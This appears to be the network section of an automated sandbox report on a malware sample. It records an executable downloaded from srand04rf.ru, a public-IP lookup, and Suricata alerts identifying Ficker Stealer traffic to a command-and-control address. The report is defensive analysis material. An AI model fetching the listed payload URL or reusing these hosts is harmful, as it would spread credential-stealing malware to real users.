Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
api.ipify.org | 54.243.175.83 | |
srand04rf.ru | 8.209.119.208 | |
pospvisis.com | 185.66.15.228 |
- UDP Requests
-
-
192.168.56.103:58285 164.124.101.2:53
-
192.168.56.103:58575 164.124.101.2:53
-
192.168.56.103:58935 164.124.101.2:53
-
192.168.56.103:64714 164.124.101.2:53
-
192.168.56.103:65511 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:1900 239.255.255.250:1900
-
192.168.56.103:49152 239.255.255.250:3702
-
192.168.56.103:50368 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.103:123
-
8.8.8.8:53 192.168.56.103:58575
-
GET
200
http://www.bing.com/favicon.ico
REQUEST
RESPONSE
BODY
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.bing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public, max-age=15552000
Content-Length: 4286
Content-Type: image/x-icon
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
X-Cache: TCP_HIT
Server: Kestrel
X-SNR-Routing: 1
X-MSEdge-Ref: Ref A: ECA326A94EC14D959AA5D8750FB13252 Ref B: SLAEDGE1007 Ref C: 2021-06-17T04:35:55Z
Date: Thu, 17 Jun 2021 04:35:54 GMT
GET
200
http://srand04rf.ru/f7juhkryu4.exe
REQUEST
RESPONSE
BODY
GET /f7juhkryu4.exe HTTP/1.1
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: srand04rf.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 17 Jun 2021 04:35:55 GMT
Content-Type: application/octet-stream
Content-Length: 272910
Connection: keep-alive
Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
ETag: "60c0e5a8-42a0e"
Accept-Ranges: bytes
GET
200
http://api.ipify.org/?format=xml
REQUEST
RESPONSE
BODY
GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Thu, 17 Jun 2021 04:36:03 GMT
Content-Length: 15
Via: 1.1 vegur
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 92.62.115.177:80 -> 192.168.56.103:49608 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49608 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
TCP 192.168.56.103:49606 -> 50.19.92.227:80 | 2029622 | ET POLICY External IP Lookup (ipify .org) | Potential Corporate Privacy Violation |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2014819 | ET INFO Packed Executable Download | Misc activity |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 92.62.115.177:80 -> 192.168.56.103:49609 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49609 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts